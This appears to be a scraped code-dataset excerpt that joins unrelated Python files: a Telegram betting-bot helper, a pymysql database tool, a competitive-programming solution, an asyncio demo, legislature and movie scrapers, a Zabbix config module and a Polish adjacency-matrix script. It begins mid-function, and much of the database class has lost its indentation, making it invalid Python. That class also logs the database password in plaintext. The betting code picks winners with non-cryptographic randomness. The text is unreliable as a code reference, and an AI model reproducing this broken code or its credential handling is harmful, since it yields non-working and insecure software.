    if str(bet) in users[user_name]['bets']:
        return False
    users[user_name]['bets'][bet] = False
    json_writer(users, config.USER_FILE_NAME)
    return True
def get_name_by_id(telegram_id):
    """Reverse lookup: wallet name for a Telegram id (None when absent)."""
    users = json_reader(config.USER_FILE_NAME)
    for wallet, record in users.items():
        if record['telegram_id'] == telegram_id:
            return wallet
def check_for_existence(account):
    """Return True if the blockchain account exists (lookup succeeds)."""
    try:
        chain.account_info(account)['account_name']
        return True
    except Exception:
        # Narrowed from a bare ``except`` so KeyboardInterrupt/SystemExit
        # are no longer swallowed; the RPC error type itself is unknown
        # here, hence the broad Exception.
        return False
def get_hash(): # Return the stored commitment hash
    return json_reader(config.HASH_FILE_NAME)['hash']
def keyboard_configur(*args): # (list)
    # Build an inline Telegram keyboard from the first positional argument
    # (a list of button specs) via the keyboa library.
    return keyboa.Keyboa(args[0]).keyboard
def hash_update(): # Roll a new winning number and publish its hash
    # NOTE(review): the `random` module is not cryptographically secure;
    # consider `secrets` for picking the winning number.
    ran = random.randint(1, 10000)
    hashh, salt, num = creates_a_hash_of_the_winning_number(ran)
    # Archive the previous commitment, keyed by timestamp.
    old = json_reader(config.OLD_HASHES_FILE_NAME)
    old[time.time()] = json_reader(config.HASH_FILE_NAME)
    json_writer(old, config.OLD_HASHES_FILE_NAME)
    # Persist the new number, salt and hash.
    data = {"num": num, "salt": salt, "hash": hashh}
    json_writer(data, config.HASH_FILE_NAME)
# Collect every transaction authorised by the given user.
def find_all_transactions_with_a_user(user, txs):
    """Filter a get_actions payload down to the actions whose first
    authorization actor equals *user*."""
    return [action for action in txs['actions']
            if action['action_trace']['act']['authorization'][0]['actor'] == user]
# Check whether a trx_id is already recorded in the user database.
def сheck_trx_id_for_presence_in_the_database(tx):
    """Return True if any user's bets reference transaction id *tx*.

    Bug fix: a for/else on the inner loop made the original return False
    after scanning only the FIRST user's bets; now every user is checked
    (and an empty table yields False instead of None).
    (Note: the function name's first letter is a Cyrillic 'с' -- kept for
    caller compatibility.)
    """
    users = json_reader(config.USER_FILE_NAME)
    for record in users.values():
        if tx in record['bets'].values():
            return True
    return False
def get_memo(data):
    """Memo string of a transfer action."""
    act = data['action_trace']['act']
    return act['data']['memo']
def get_tx(data):
    """Transaction id of an action."""
    trace = data['action_trace']
    return trace['trx_id']
def get_quantity(data):
    """Transferred amount string of a transfer action."""
    act = data['action_trace']['act']
    return act['data']['quantity']
def get_user_name(data):
    """Sender account ('from' field) of a transfer action."""
    act = data['action_trace']['act']
    return act['data']['from']
# Attach a deposit transaction id to a previously placed bet.
def replace_false_with_trx_id(user_name: str, bet: str, tx: str):
    """Store *tx* on the user's *bet*.

    If the bet exists and is still unpaid (value False) it receives *tx*;
    if it already carries a transaction id, return False.  A missing bet is
    created directly with *tx*.  (A dead triple-quoted copy of the old loop
    implementation was removed.)
    """
    users = json_reader(config.USER_FILE_NAME)
    bets = users[user_name]['bets']
    try:
        if bets[bet] == False:
            bets[bet] = tx
        else:
            return False
    except KeyError:
        # Narrowed from a bare ``except``: "bet not present" is the only
        # expected failure here.
        bets[bet] = tx
    json_writer(users, config.USER_FILE_NAME)
# Attach a deposit to the first unpaid bet found for the user.
def to_the_first_bet_that_comes_across(user_name, tx):
    """Assign *tx* to the user's first bet whose value is still False.

    Returns True when a slot was found, False otherwise.
    NOTE(review): unlike replace_false_with_trx_id(), this never calls
    json_writer(), so the assignment mutates only the in-memory dict and is
    lost -- confirm whether the missing persistence is intentional.
    """
    users = json_reader(config.USER_FILE_NAME)
    for bet in users[user_name]['bets']:
        if users[user_name]['bets'][bet] == False:
            users[user_name]['bets'][bet] = tx
            return True
    else:
        return False
# True adds 0.01 to the prize fund; False resets it to zero.
def accounting_for_the_prize_fund(waht : bool):
    """Increment (by 0.01) or reset the persisted prize-fund amount.

    NOTE(review): repeated float += 0.01 accumulates binary rounding error;
    consider integer cents or decimal.Decimal.  (Parameter name 'waht' is a
    typo kept for compatibility with keyword callers.)
    """
    how_much = json_reader(config.PRIZE_FUND)
    if waht:
        how_much[0] += 0.01
    else:
        how_much[0] = 0
    json_writer(how_much, config.PRIZE_FUND)
import os
import sys
rootpath = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))).replace("\\","/")
print("DBTOOL: %s" % rootpath)
syspath=sys.path
sys.path=[]
sys.path.append(rootpath) #指定搜索路径绝对目录
sys.path.extend([rootpath+i for i in os.listdir(rootpath) if i[0]!="."])#将工程目录下的一级目录添加到python搜索路径中
sys.path.extend(syspath)
from core.tools.CommonFunc import *
class DBTool(object):
"""数据库处理类
处理数据库相关操作
"""
    def __init__(self, host='', port=3306, username='', password='',db='',isDictCursor = True):
        """Store connection settings; no connection is opened here.

        isDictCursor: when True, queries return rows as dicts instead of
        tuples.
        """
        # __open tracks whether a live connection is currently held.
        self.__open = False
        self.__host = host
        self.__port = port
        self.__username = username
        self.__password = password
        self.__db = db
        self.__isDictCursor = isDictCursor
        self.errMsg = ""
        # (Disabled: debug logging of the DB address and eager connect.)
        # logging.debug( u"DBTool.py: __init__: 数据库地址:%s。" % host )
        # if self.__host != '':
        #     self.connect()
    def __enter__(self):
        # Context-manager entry: adopt the global DB config and connect.
        self.initGlobalDBConf()
        return self
    def __exit__(self, *args):
        # Context-manager exit: always close the connection.
        self.release()
def initGlobalDBConf(self):
self.__host = DBConf.dbHost
self.__port = DBConf.dbPort
self.__username = DBConf.dbUsername
self.__password = DBConf.dbPassword
self.__db = DBConf.dbName
if self.__host != '' and self.__open == False:
self.connect()
return self
def setCursorDict(self, state = True):
self.__isDictCursor = state
def isDictCursor(self):
return self.__isDictCursor
def connect(self):
if self.__open:
try:
self.__conn.ping()
return True
except:
# 连接出现异常了,重新连接
pass
try:
if self.__db =='':
# 打开数据库连接
self.__conn = pymysql.connect(host=self.__host, user=self.__username,
password=self.__password, port=self.__port)
else:
self.__conn = pymysql.connect(host=self.__host, user=self.__username,
password=self.__password, port=self.__port, db=self.__db)
self.__conn.set_charset('utf8')
self.__open = True
return True
# logging.debug( u"DBTool.py: connect: 数据库连接成功。")
except Exception as e:
logging.error(traceback.format_exc())
self.errMsg = "数据库连接异常!\n%s" % traceback.format_exc()
logging.error( "DBTool.py: connect: FATAL_ERROR: 创建数据库连接失败[%s],请检查数据库配置以及数据库可用性。数据库信息:Host:[%s] Port:[%s] User:[%s] Pass:[%s]" %(e,self.__host,self.__port,self.__username,self.__password))
return False
def release(self):
if self.__open:
try:
self.__conn.close()
except Exception as e:
logging.error(traceback.format_exc())
finally:
self.__open = False
# if self.__open == False:
# logging.debug( u"DBTool.py: release: 数据库连接连接断开。")
def flush(self):
self.release()
self.connect()
def execute_sql(self, sql,auto_release = False):
"""执行sql语句
:param sql: excel传入的sql.
:return: 返回成功失败,只有所有的都成功才返回成功
"""
try:
self.connect()
# logging.debug ("DBTool.py: execute_sql: 执行SQL:%s " % sql)
if self.__isDictCursor:
cursor = self.__conn.cursor(pymysql.cursors.DictCursor)
else:
cursor = self.__conn.cursor()
cursor.execute('SET NAMES utf8;')
cursor.execute('SET CHARACTER SET utf8;')
cursor.execute('SET character_set_connection=utf8;')
cursor.execute(sql)
self.__conn.commit()
data = cursor.fetchall()
# 关闭数据库连接
return data
except Exception as e:
logging.error(traceback.format_exc())
logging.debug( "DBTool.py: execute_sql : 发生异常:%s, 异常类型%s." % (e,type(e)))
return False
finally:
if auto_release:
self.release()
def execute_update_sql(self, sql, auto_release = False):
"""执行sql语句
:param sql: excel传入的sql.
:return: 返回成功失败,只有所有的都成功才返回成功
"""
try:
self.connect()
# logging.debug ("DBTool.py: execute_sql: 执行SQL:%s " % sql)
if self.__isDictCursor:
cursor = self.__conn.cursor(pymysql.cursors.DictCursor)
else:
cursor = self.__conn.cursor()
cursor.execute('SET NAMES utf8;')
cursor.execute('SET CHARACTER SET utf8;')
cursor.execute('SET character_set_connection=utf8;')
res = cursor.execute(sql)
self.__conn.commit()
# 关闭数据库连接
return res
except Exception as e:
logging.error(traceback.format_exc())
print(traceback.format_exc())
logging.debug( "DBTool.py: execute_sql : 发生异常:%s, 异常类型%s." % (e,type(e)))
return False
finally:
if auto_release:
self.release()
def get_effected_rows_count(self, sql, auto_release = False):
"""执行sql语句
:param sql: excel传入的sql.
:return: 返回成功失败,只有所有的都成功才返回成功
"""
sql = sql.strip()
sql_lower = sql.lower()
try:
self.connect()
cursor = self.__conn.cursor()
cursor.execute('SET NAMES utf8;')
cursor.execute('SET CHARACTER SET utf8;')
cursor.execute('SET character_set_connection=utf8;')
curd_judge_string = sql_lower[0:6]
#logging.debug(u"DBTool.py:get_effected_rows_count:curd_judge_string:[%s]" % curd_judge_string)
if curd_judge_string == "select":
#logging.debug(u"DBTool.py:get_effected_rows_count:INTO select.")
cursor.execute(sql)
#logging.debug(u"DBTool.py:get_effected_rows_count: SELECT影响行数:%d" % cursor.rowcount)
return cursor.rowcount
elif curd_judge_string == 'update':
sql_lower = sql.lower().strip()
where_loc = sql_lower.find('where')
set_loc = sql_lower.find('set')
table_name = sql[6:set_loc].strip()
where_str = sql[where_loc + 5:].strip()
if where_loc == -1:
return ServiceConf.sql_effect_lines+1
new_sql = "select * from %s where %s" % (table_name, where_str)
cursor.execute(new_sql)
return cursor.rowcount
elif curd_judge_string == 'delete':
# delete from tablename where where cb = 2 to select * from tablename where xxxxxx
sql_lower = sql.lower().strip()
from_loc = sql_lower.find('from')
where_loc = sql_lower.find('where')
table_name = sql[from_loc + 4:where_loc == -1 and len(sql) or where_loc + 1]
where_str = sql[where_loc + 5:].strip()
if where_loc == -1:
return ServiceConf.sql_effect_lines+1
new_sql = "select * from %s where %s" % (table_name, where_str)
cursor.execute(new_sql)
return cursor.rowcount
elif curd_judge_string == 'insert':
return 1
else:
return -1
# 关闭数据库连接
except Exception as e:
logging.error(traceback.format_exc())
return -1
finally:
if auto_release:
self.release()
# Module is import-only; no command-line behaviour.
if __name__ == "__main__":
    pass
| LianjiaTech/sosotest | AutotestFramework/core/tools/DBTool.py | DBTool.py | py | 8,233 | python | en | code | 489 | github-code | 90 |
17981062729 | # -*- coding: utf-8 -*-
import sys
from collections import deque, defaultdict
from math import sqrt, factorial, gcd
# def input(): return sys.stdin.readline()[:-1] # warning not \n
# def input(): return sys.stdin.buffer.readline().strip() # warning bytes
# def input(): return sys.stdin.buffer.readline().decode('utf-8')
def solve():
    """Read n and n integers; print them in the zig-zag arrangement.

    Element i is appended on the right for even i and on the left for
    odd i; for odd n the final sequence is reversed before printing.
    """
    n = int(input())
    values = list(map(int, input().split()))
    arranged = deque()
    for idx, value in enumerate(values):
        if idx % 2 == 0:
            arranged.append(value)
        else:
            arranged.appendleft(value)
    if n % 2 == 1:
        arranged.reverse()
    print(*arranged)
# Single test case by default; uncomment the input() line for multi-case input.
t = 1
# t = int(input())
for case in range(1,t+1):
    ans = solve()
"""
abc
"""
| Aasthaengg/IBMdataset | Python_codes/p03673/s086382115.py | s086382115.py | py | 663 | python | en | code | 0 | github-code | 90 |
32057996662 | # 3个要点 时间循环 + 回调(驱动生成器) + epoll(IO多路复用)
# asyncio是Python用于解决异步IO编程的一整套解决方案
# Tornado,gevent,Twisted(Scrapy, django channels)
# 使用asyncio
# 使用协程,必须搭配 事件循环才能使用
import time
import asyncio
# 处理回调函数传参问题
from functools import partial
async def get_url(url):
    """Simulate fetching *url*: wait 2 seconds asynchronously, return the url."""
    print(f'start url:{url}')
    # time.sleep(2)  # a blocking sleep here would stall the event loop
    # Time-consuming operations must be awaited; asyncio.sleep() is used
    # purely to simulate such an operation.
    await asyncio.sleep(2)
    print(f'end url: {url}')
    return url
def callback(future):
    """Done-callback for a task: pretend to send a notification e-mail."""
    message = 'send email xiaowei'
    print(message)
def callback_params(url, future):
    """Done-callback that also receives *url*, pre-bound via functools.partial."""
    greeting = 'hello world'
    print(greeting, url)
if __name__ == '__main__':
    start_time = time.time()
    # Obtain the asyncio event loop.
    loop = asyncio.get_event_loop()
    # Blocking call: waits for the coroutine to finish before moving on
    # (single-task submission):
    # loop.run_until_complete(get_url('https://www.baidu.com'))
    # Submitting multiple tasks:
    # tasks = [get_url(f'https://www.baidu.com/{i}') for i in range(10)]
    # loop.run_until_complete(asyncio.wait(tasks))
    # Getting a task's return value:
    # get_future = loop.create_task(get_url(f'https://www.baidu.com/{1}'))
    # or:
    get_future = asyncio.ensure_future(get_url(f'https://www.baidu.com/{1}'))
    # Attach a completion callback to the task.
    get_future.add_done_callback(callback)
    # To pass extra arguments to a callback, bind them with functools.partial.
    get_future.add_done_callback(partial(callback_params, 'xiaoweigege'))
    # Register the task with the loop and run it to completion.
    loop.run_until_complete(get_future)
    return_url = get_future.result()
    print('获取结果', return_url)
    end_time = time.time()
    print(f'总共耗时:{end_time-start_time}') | xiaoweigege/Python_senior | chapter12/1. loop.py | 1. loop.py | py | 1,783 | python | zh | code | 1 | github-code | 90
70668810856 | #!/usr/bin/env python3
import torch
def make_embedder(
    architecture: str='GPT',
    training_style: str='CSM',
    in_dim: int=1024,
    embed_dim: int=768,
    num_hidden_layers: int=1,
    masking_rate: float=0.2,
    dropout: float=0.1,
    t_r_precision: float = 0.2, # in seconds
    max_t_r: float = 300, # in seconds (= 10min)
    n_positions: int=512
    ) -> torch.nn.Module:
    """
    Make an embedder object.
    The embedder is used to prepare an input batch
    (as generated by src.batcher) for training and
    compute the model's training loss, given the
    specified training style.

    Args:
    -----
    architecture: str
        The model architecture to use.
        One of: 'GPT', 'BERT', 'NetBERT', autoencoder',
        'PretrainedGPT', 'PretrainedBERT', 'LinearBaseline'.
    training_style: str
        The used training style (ie., framework).
        One of: 'BERT', 'CSM', 'NetBERT', 'autoencoder',
        'decoding'.
    in_dim: int
        The input dimension (ie., # networks) of the
        parcelated BOLD data.
    embed_dim: int
        The dimension of the used embedding space.
    num_hidden_layers: int
        The number of hidden layers of the embedding
        model. If more than one layers are used, all
        layers except the last one are activated through
        Gelu activation (see src.base.EmbeddingModel).
    masking_rate: float
        Masking rate used for BERT-style models.
    dropout: float
        Dropout rate used emebdding model.
    t_r_precision: float
        The precision of the repetition time (ie., TR)
        embedding (in seconds).
    max_t_r: float
        The maximum repetition time (in seconds) that
        the model can handle (in seconds).
    n_positions: int
        The maximum number of sequence elements that
        the model can handle (in sequence elements).

    Core methods:
    -----
    prep_batch(batch):
        Makes all training-style specific edits of input batch
        (as generated by src.batcher);
        i.e., projection of input BOLD sequences into an
        embedding space (as defined by embed_dim)
        and addition of all training-style specific tokens to
        the input data
    loss(batch, outputs):
        Compute the training-style specific loss,
        given batch (as generated by prep_batch) and
        the the full model's (see src.model) output
        (as generated by model.forward)
    switch_decoding_mode(is_decoding_mode):
        Switch the embedder to decoding mode (is_decoding_mode=True).
        This function is needed to adapt a pre-trained model
        to a downstream decoding task.
    """
    # All embedder classes share this constructor signature.
    kwargs = {
        "in_dim": in_dim,
        "embed_dim": embed_dim,
        "num_hidden_layers": num_hidden_layers,
        "masking_rate": masking_rate,
        "dropout": dropout,
        "t_r_precision": t_r_precision,
        "max_t_r": max_t_r,
        "n_positions": n_positions
    }
    # Dispatch on the training style; imports are kept local so that only
    # the selected embedder module is loaded.
    if training_style == 'autoencoder':
        from src.embedder.autoen import AutoenEmbedder
        embedder = AutoenEmbedder(**kwargs)
    elif training_style == 'CSM':
        from src.embedder.csm import CSMEmbedder
        embedder = CSMEmbedder(**kwargs)
    elif training_style == 'MSM':
        from src.embedder.msm import MSMEmbedder
        embedder = MSMEmbedder(**kwargs)
    elif training_style == 'MNM':
        from src.embedder.mnm import MNMEmbedder
        embedder = MNMEmbedder(**kwargs)
    elif training_style == 'BERT':
        from src.embedder.bert import BERTEmbedder
        embedder = BERTEmbedder(**kwargs)
    elif training_style == 'NetBERT':
        from src.embedder.netbert import NetBERTEmbedder
        embedder = NetBERTEmbedder(**kwargs)
    elif training_style == 'decoding':
        # Decoding mode: the embedder is chosen by backbone architecture
        # instead of by training style.
        if architecture == 'autoencoder':
            from src.embedder.autoen import AutoenEmbedder
            embedder = AutoenEmbedder(**kwargs)
        elif architecture in {'GPT', 'PretrainedGPT2'}:
            from src.embedder.csm import CSMEmbedder
            embedder = CSMEmbedder(**kwargs)
        elif architecture in {
            'BERT',
            'PretrainedBERT',
            'PretrainedDistilBERT',
            'PretrainedRoBERTa'
            }:
            from src.embedder.bert import BERTEmbedder
            embedder = BERTEmbedder(**kwargs)
        elif architecture == 'NetBERT':
            from src.embedder.netbert import NetBERTEmbedder
            embedder = NetBERTEmbedder(**kwargs)
        elif architecture == 'LinearBaseline':
            from src.embedder.dummy import DummyEmbedder
            embedder = DummyEmbedder(**kwargs)
        else:
            raise ValueError('unkown architecture')
    else:
        raise ValueError('unknown training style.')
    return embedder | athms/learning-from-brains | src/embedder/make.py | make.py | py | 4,842 | python | en | code | 50 | github-code | 90
18814521417 | import pytz
import dateutil.parser
import datetime
import re
from utils import LXMLMixin
from openstates.scrape import Scraper, Event
from openstates.exceptions import EmptyScrape
# http://mgaleg.maryland.gov/mgawebsite/Meetings/Day/0128202102282021?budget=show&cmte=allcommittees&updates=show&ys=2021rs
class MDEventScraper(Scraper, LXMLMixin):
    """Scrape Maryland General Assembly committee hearings into Event objects."""
    _tz = pytz.timezone("US/Eastern")
    chambers = {"upper": "Senate", "lower": ""}
    # MGA day-range URLs use MMDDYYYY.
    date_format = "%m%d%Y"
    # Matches "<committee> - Bill Hearing" so the suffix can be stripped.
    bill_hear_re = re.compile(r"(.+)( - Bill Hearing)")
    def scrape(self, session=None, start=None, end=None):
        """Yield hearing Events between *start* and *end* (default: now + 60 days).

        Raises EmptyScrape when both chambers report no hearings or no
        event could be parsed.
        """
        if start is None:
            start_date = datetime.datetime.now().strftime(self.date_format)
        else:
            start_date = datetime.datetime.strptime(start, "%Y-%m-%d")
            start_date = start_date.strftime(self.date_format)
        # default to 60 days if no end
        if end is None:
            dtdelta = datetime.timedelta(days=60)
            end_date = datetime.datetime.now() + dtdelta
            end_date = end_date.strftime(self.date_format)
        else:
            end_date = datetime.datetime.strptime(end, "%Y-%m-%d")
            end_date = end_date.strftime(self.date_format)
        # regular gets an RS at the end, special gets nothing because s1 is in the session
        if session[-2] != "s":
            session += "rs"
        url = "https://mgaleg.maryland.gov/mgawebsite/Meetings/Day/{}{}?budget=show&cmte=allcommittees&updates=show&ys={}"
        url = url.format(start_date, end_date, session)
        page = self.lxmlize(url)
        # if both "<house banner> No Hearings Message" and "<senate banner> No Hearings Message"
        empty_chamber = "//div[div/div[contains(@class,'{chamber}')]]/following-sibling::text()[contains(.,'No hearings')]"
        if page.xpath(empty_chamber.format(chamber="Senate")) and page.xpath(
            empty_chamber.format(chamber="House")
        ):
            raise EmptyScrape
        event_count = 0
        # Each <hr> separates one hearing; its metadata lives in the
        # preceding sibling divs.
        for row in page.xpath('//div[@id="divAllHearings"]/hr'):
            banner = row.xpath(
                'preceding-sibling::div[contains(@class,"row")]/div/div[contains(@class,"hearsched-committee-banner")]'
            )[-1]
            banner_class = banner.xpath("@class")[0]
            chamber = ""
            if "house" in banner_class:
                chamber = "Assembly"
            elif "senate" in banner_class:
                chamber = "Senate"
            meta = row.xpath(
                'preceding-sibling::div[contains(@class,"hearsched-hearing-header")]'
            )[-1]
            data = row.xpath('preceding-sibling::div[contains(@class,"row")]')[-1]
            # First bold/centered cell is the date, second the committee.
            when = meta.xpath(
                './/div[contains(@class,"font-weight-bold text-center")]/text()'
            )[0].strip()
            com_row = meta.xpath(
                './/div[contains(@class,"font-weight-bold text-center")]/text()'
            )[1].strip()
            if chamber != "":
                com_row = f"{chamber} {com_row}"
            # if they strike all the header rows, its cancelled
            unstruck_count = len(
                meta.xpath(
                    './/div[contains(@class,"font-weight-bold text-center") and(not(contains(@class,"hearsched-strike")))]'
                )
            )
            if unstruck_count == 0:
                self.info(f"Skipping {com_row} {when} -- it appears cancelled")
                continue
            # find the first unstruck time row
            time_loc = meta.xpath(
                './/div[contains(@class,"font-weight-bold text-center")'
                'and(contains(text(),"AM") or contains(text(),"PM")) and(not(contains(@class,"hearsched-strike")))]/text()'
            )[0].strip()
            # "HH:MM AM - Room" style rows carry the location after a dash.
            if "-" in time_loc:
                time = time_loc.split("-")[0].strip()
                where = time_loc.split("-")[1].strip()
            else:
                time = time_loc
                where = "See Committee Site"
            if com_row == "":
                continue
            bill_hearing_format = self.bill_hear_re.search(com_row)
            if bill_hearing_format:
                com_row = bill_hearing_format.groups()[0]
            # remove end dates
            when = re.sub(r"to \d+:\d+\s*\w+", "", f"{when} {time}").strip()
            when = dateutil.parser.parse(when)
            when = self._tz.localize(when)
            event = Event(
                name=com_row,
                location_name=where,
                start_date=when,
                classification="committee-meeting",
            )
            # Strip "Work Session" to recover the plain committee name.
            com_name = re.sub(r"[\s\-]*Work Session", "", com_row)
            if com_name:
                event.add_participant(name=com_name, type="committee", note="host")
            event.add_source("https://mgaleg.maryland.gov/mgawebsite/Meetings/Week/")
            for agenda_row in data.xpath(
                "div/div/div[contains(@class,'hearsched-table')]"
            ):
                children = agenda_row.xpath("div")
                # bill row
                if len(children) == 4:
                    if agenda_row.xpath("div[1]/a"):
                        agenda = event.add_agenda_item(
                            agenda_row.xpath("div[4]/text()")[0].strip()
                        )
                        bill_num = agenda_row.xpath("div[1]/a/text()")[0].strip()
                        agenda.add_bill(bill_num)
                elif len(children) == 1:
                    # Plain-text agenda row (no bill link).
                    agenda = event.add_agenda_item(
                        agenda_row.xpath("div[1]")[0].text_content().strip()
                    )
            event_count += 1
            yield event
        if event_count < 1:
            raise EmptyScrape
| openstates/openstates-scrapers | scrapers/md/events.py | events.py | py | 5,751 | python | en | code | 820 | github-code | 90 |
73626283495 | #-*- coding: utf-8 -*-
import scrapy
from scrapy.spiders import Rule
from scrapy.linkextractors import LinkExtractor
from douban_movie.items import DoubanMovieItem
class AwesomeMovieSpider(scrapy.spiders.CrawlSpider):
    """Crawl douban movie subject pages, extracting name, summary and score."""
    name = 'awesome-movie'
    allowed_domains = ['movie.douban.com']
    start_urls = ['https://movie.douban.com/subject/3011091/']
    # Follow links to other movie subject pages and parse each one.
    rules = (
        Rule(LinkExtractor(allow='https://movie.douban.com/subject/\d+/\?'),
             callback='parse_item', follow=True),
    )
    def parse_item(self, response):
        """Build a DoubanMovieItem from one subject page."""
        item = DoubanMovieItem()
        item['url'] = response.url
        item['name'] = response.xpath(
            '//span[@property="v:itemreviewed"]/text()').extract_first().strip()
        item['summary'] = response.xpath(
            '//span[@property="v:summary"]/text()').extract_first().strip()
        item['score'] = response.xpath(
            '//strong[@property="v:average"]/text()').extract_first().strip()
        return item
    def parse_start_url(self, response):
        """Also parse the start URL itself (CrawlSpider skips it by default)."""
        yield self.parse_item(response)
    def parse_page(self, response):
        """Alias kept for compatibility; parses one page into an item."""
        yield self.parse_item(response)
| Yao-Phoenix/challenge | challenge20/douban_movie/douban_movie/spiders/awesome_movie.py | awesome_movie.py | py | 1,168 | python | en | code | 0 | github-code | 90 |
22833545574 | """
Configuration specific modules and functions
"""
import logging
from es_client import Builder
from es_client.helpers.schemacheck import SchemaCheck
from es_client.helpers.utils import get_yaml, prune_nones
from es_stats_zabbix.defaults.config import schema
from es_stats_zabbix.defaults.settings import apis
from es_stats_zabbix.exceptions import ConfigurationError
from es_stats_zabbix.helpers.logtools import set_logging
LOGGER = logging.getLogger(__name__)
# Top-level sections expected in the configuration file.
TOP_LEVEL = ['elasticsearch', 'logging', 'backend', 'zabbix', 'endpoints']
# Keys accepted under elasticsearch.client.
CLIENT_KEYS = [
    'host', 'port', 'url_prefix', 'use_ssl', 'ca_certs', 'client_cert', 'client_key',
    'verify_certs', 'username', 'password', 'timeout',
]
ELASTICSEARCH_KEYS = ['client', 'master_only']
LOGGING_KEYS = ['loglevel', 'logfile', 'logformat', 'blacklist']
BACKEND_KEYS = ['apihost', 'apiport', 'apidebug', 'cache_timeout']
# Maps the command-line 'zbx_*' option names back to the CamelCase keys
# expected by Zabbix (prefixed to avoid clashing with elasticsearch keys).
ZBXKEYMAP = {
    'zbx_serveractive': 'ServerActive',
    'zbx_serverport': 'ServerPort',
    'zbx_logtype': 'LogType',
    'zbx_logfile': 'LogFile',
    'zbx_debuglevel': 'DebugLevel',
    'zbx_timeout': 'Timeout',
    'zbx_hostname': 'Hostname',
    'zbx_tlsconnect': 'TLSConnect',
    'zbx_tlscafile': 'TLSCAFile',
    'zbx_tlscertfile': 'TLSCertFile',
    'zbx_tlscrlfile': 'TLSCRLFile',
    'zbx_tlskeyfile': 'TLSKeyFile',
    'zbx_tlsservercertissuer': 'TLSServerCertIssuer',
    'zbx_tlsservercertsubject': 'TLSServerCertSubject',
    'zbx_tlspskidentity': 'TLSPSKIdentity',
    'zbx_tlspskfile': 'TLSPSKFile',
}
def default_config():
    """Return the baseline configuration skeleton.

    Contains the static ``do_not_discover`` map plus an empty dict for
    every expected top-level section.
    """
    defaults = {'do_not_discover': {'health': ['status']}}
    defaults.update((section, {}) for section in TOP_LEVEL)
    return defaults
def get_client(cfg):
    """
    Return an Elasticsearch client object from a configuration dictionary.

    :param cfg: configuration dictionary consumed by es_client.Builder
    :raises ConfigurationError: if the connection cannot be established
    """
    try:
        return Builder(cfg).client
    except Exception as err:
        msg = 'Failed to connect to Elasticsearch: Exception: {0}'.format(err)
        LOGGER.error(msg)
        raise ConfigurationError(msg)
def check_schema(cfg, key):
    """
    Validate the *key* section of *cfg* against its voluptuous schema.

    Returns ``{key: validated_section}`` with None values pruned.
    :raises ConfigurationError: if validation fails
    """
    try:
        return SchemaCheck(
            {key: prune_nones(cfg[key])},
            schema(key),
            '{0} Configuration'.format(key.title()),
            key
        ).result()
    except Exception as err:
        msg = 'Failed to configure {0}: Exception: {1}'.format(key, err)
        LOGGER.error(msg)
        raise ConfigurationError(msg)
def configure_logging(cfg):
    """
    Read logging configuration and initiate logging.

    Validates cfg['logging'] first, then hands it to set_logging.
    """
    set_logging(check_schema(cfg, 'logging')['logging'])
def get_config(cfg, key):
    """Return the schema-validated sub-dict for *key*.

    Thin wrapper around
    :func:`es_stats_zabbix.helpers.config.check_schema`.
    """
    validated = check_schema(cfg, key)
    return validated[key]
def config_override(ctx):
    """
    Override the settings in the config file with the options provided at
    the command-line.

    :param ctx: a click context whose ``params`` carry the CLI options
    :returns: the merged configuration dictionary
    """
    params = prune_nones(ctx.params)
    # Start from the YAML file when given, else from the built-in defaults.
    if 'config' in params:
        config_dict = get_yaml(params['config'])
    else:
        config_dict = default_config()
    for toplevel in TOP_LEVEL:
        if toplevel == 'elasticsearch':
            for k in ELASTICSEARCH_KEYS:
                if k == 'master_only':
                    if k in params:
                        config_dict[toplevel][k] = params[k]
                else:
                    # k == 'client': merge the per-client connection keys.
                    if not k in config_dict[toplevel]:
                        config_dict[toplevel][k] = {}
                    for subk in CLIENT_KEYS:
                        if subk in params:
                            # If we supply multiple hosts on the command line, they come as a tuple
                            if subk == 'host':
                                if params[subk]:
                                    # This "None" doesn't get pruned, it's an empty tuple
                                    config_dict[toplevel][k]['hosts'] = list(params[subk])
                            else:
                                config_dict[toplevel][k][subk] = params[subk]
        if toplevel == 'logging':
            for k in LOGGING_KEYS:
                if k in params:
                    config_dict[toplevel][k] = params[k]
        if toplevel == 'zabbix':
            # In order to prevent the elasticsearch and zabbix key names from
            # colliding, all zabbix keys were prefaced with 'zbx_'.
            # We have to strip the 'zbx_' away again, and remap back to the
            # CamelCase versions here.
            for k in list(ZBXKEYMAP.keys()):
                if k in params:
                    config_dict[toplevel][ZBXKEYMAP[k]] = params[k]
        if toplevel == 'backend':
            for k in BACKEND_KEYS:
                if k in params:
                    if k[:3] == 'api':
                        renamed = k[3:] # Remove 'api' from 'apihost', 'apiport', and 'apidebug'
                        config_dict[toplevel][renamed] = params[k]
                    else: # Cover cache_timeout this way
                        config_dict[toplevel][k] = params[k]
    return config_dict
def extract_endpoints(data):
    """Flatten the nested endpoints mapping into a single list.

    *data* maps nodetype -> interval -> api -> list of endpoints; the
    per-api endpoint lists are concatenated in iteration order.
    """
    return [
        endpoint
        for by_interval in data.values()
        for by_api in by_interval.values()
        for endpoint_list in by_api.values()
        for endpoint in endpoint_list
    ]
| untergeek/es_stats_zabbix | es_stats_zabbix/helpers/config.py | config.py | py | 5,472 | python | en | code | 11 | github-code | 90 |
17300960638 | #-*-coding:utf-8-*-
# Interactively build a symmetric adjacency matrix for an undirected graph.
wierzchołki = int(input("podaj liczbę wierzchołków: "))
print("wierzchołki zostały ponumerowane od 0 do %s" %(wierzchołki-1))
macierz = {}
for i in range(wierzchołki):
    macierz[i] = []
    for k in range(wierzchołki):
        if i != k:
            if k in macierz.keys():
                # Row k was filled earlier: mirror its value (symmetry),
                # so each edge is asked about only once.
                macierz[i].append(macierz[k][i])
            else:
                # Ask the user whether vertices i and k are connected (0/1).
                sąsiedztwo = int(input("wpisz 0 lub 1 w zależności czy wierzchołek %s jest połączony z wierzchołkiem %s: " %(i,k)))
                macierz[i].append(sąsiedztwo)
        else:
            # No self-loops on the diagonal.
            macierz[i].append(0)
print("macierz sąsiedztwa: ")
print(macierz)
def stopien_wierzcholkow(macierz):
    """Return the degree of every vertex.

    *macierz* maps each vertex to its adjacency row (list of 0/1
    flags); the degree is the row sum.  Degrees are returned in key
    iteration order.  (The original parameter was named ``dict``,
    shadowing the builtin; callers pass it positionally.)
    """
    return [sum(row) for row in macierz.values()]
def stopien_grafu(stopnie):
    """Return the degree of the graph: the maximum vertex degree.

    *stopnie* is the list produced by stopien_wierzcholkow (callers
    pass it positionally; the original name ``l`` violated PEP 8 E741).
    Raises ValueError on an empty list, as max() does.
    """
    return max(stopnie)
# Report per-vertex degrees and the overall graph degree.
l = stopien_wierzcholkow(macierz)
print("stopień wierzchołków: ")
print(l)
